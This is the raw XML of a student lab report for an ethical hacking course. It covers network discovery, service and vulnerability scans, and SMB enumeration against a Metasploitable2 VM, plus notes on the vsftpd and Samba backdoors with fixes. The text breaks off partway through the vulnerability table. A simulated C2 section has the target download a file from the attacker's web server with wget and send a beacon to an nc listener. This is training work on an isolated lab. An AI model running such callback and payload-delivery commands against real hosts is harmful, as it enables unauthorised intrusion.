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D4ED8" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Session 9 — Command &amp; Control (C2) Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="52606D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Recon, a basic C2-style interaction, and vulnerability discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Student: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MD Ala Uddin    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Student ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">64310…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Course: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ITSC3006R — Security Testing &amp; Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Page 1 — Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab was performed in a fully isolated VirtualBox Host-Only network. Kali Linux acted as the attacker and an intentionally vulnerable Metasploitable2 VM as the target. No system outside the lab was touched. The goals were to discover live hosts, enumerate open services, simulate a simple command-and-control (C2) style file transfer and beacon, enumerate SMB information, and identify exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab addresses: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker (Kali) 192.168.56.102, target (Metasploitable2) 192.168.56.101. Replace these with the actual IPs shown by ifconfig on your VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Top 2 findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:line="268"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd 2.3.4 backdoor (CVE-2011-2523). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The FTP service on port 21 is a backdoored build that opens a root shell on port 6200 when a username ending in “:)” is supplied. This gives immediate remote root access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:line="268"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba “username map script” command injection (CVE-2007-2447). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba on ports 139/445 allows remote command execution as root through a crafted username, requiring no authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation (summary)</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Upgrade or remove the vulnerable vsftpd and Samba versions; apply vendor patches and disable services that are not needed.</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Place the host behind a firewall allowing only required ports, and never expose these legacy services to untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:line="268"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Decommission end-of-life systems like Metasploitable2 outside a lab; they are unpatchable by design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Page 2 — Evidence &amp; Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity A — Discovery and service scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands run on Kali (host discovery, then full TCP SYN scan with service and OS detection):</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 1. discover live hosts on the host-only subnet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nmap -sn 192.168.56.0/24</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2. full port + service + OS scan of the target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sudo nmap -sS -sV -O -p- 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Typical open ports found on Metasploitable2 include 21 (ftp/vsftpd 2.3.4), 22 (ssh), 23 (telnet), 25 (smtp), 80 (http), 139/445 (smb), 3306 (mysql), 5432 (postgresql), 6667 (irc/UnrealIRCd).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:bottom w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:left w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:right w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF4E5" w:color="auto" w:val="clear"/>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap command and open-ports output  —  save as nmap_MD_Ala_Uddin.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity B — Simple C2-style interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali (attacker) start a web server to host a file and a netcat listener for the “beacon”:</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mkdir ~/c2_files</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echo 'lab test file' &gt; ~/c2_files/sample.txt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cd ~/c2_files</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python3 -m http.server 8000 &amp;</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nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">On Metasploitable2 (target) download the file and send a beacon back to the listener:</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wget http://192.168.56.102:8000/sample.txt -O /tmp/sample.txt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cat /tmp/sample.txt</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echo "ping from target $(hostname)" | nc 192.168.56.102 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This mirrors real C2 behaviour: the target pulls a file (payload delivery) over HTTP, then calls back (beacons) to the attacker-controlled listener.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:bottom w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:left w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
          <w:right w:val="dashed" w:color="D97706" w:sz="10" w:space="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF4E5" w:color="auto" w:val="clear"/>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali HTTP server + nc listener, and target wget / cat output  —  save as nc_wget_MD_Ala_Uddin.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity C — SMB enumeration</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enum4linux -a 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Two interesting lines to record (save as enum_MD_Ala_Uddin.txt), for example:</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 Share 'tmp'  (Mapping: OK, Listing: OK)  - readable/writable share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1D4ED8" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F2F4F7" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="252"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D2E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] user: msfadmin  rid: 0x3f2   - local account enumerated via RID cycling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1D4ED8" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:shd w:fill="EEF2FF" w:color="auto" w:val="clear"/>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The exact shares/users depend on your target; copy two real lines from your own enum4linux output into enum_MD_Ala_Uddin.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Page 3 — Vulnerability Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity D: with no Nessus installed, vulnerabilities were confirmed with nmap's vulnerability scripts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1D4ED8" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F2F4F7" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="60" w:line="252"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D2E"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap --script vuln -sV 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C7CDD6" w:sz="4"/>
          <w:left w:val="single" w:color="C7CDD6" w:sz="4"/>
          <w:bottom w:val="single" w:color="C7CDD6" w:sz="4"/>
          <w:right w:val="single" w:color="C7CDD6" w:sz="4"/>
          <w:insideH w:val="single" w:color="C7CDD6" w:sz="4"/>
          <w:insideV w:val="single" w:color="C7CDD6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2100"/>
        <w:gridCol w:w="3360"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="1D4ED8" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE / ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="1D4ED8" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="1D4ED8" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1D4ED8" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">One-line fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4 (port 21)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor build opens a root shell on port 6200 when a username ends in ':)'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove/upgrade vsftpd to a clean current version; block port 21 and disable FTP if unused.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="EEF2FF" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="EEF2FF" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
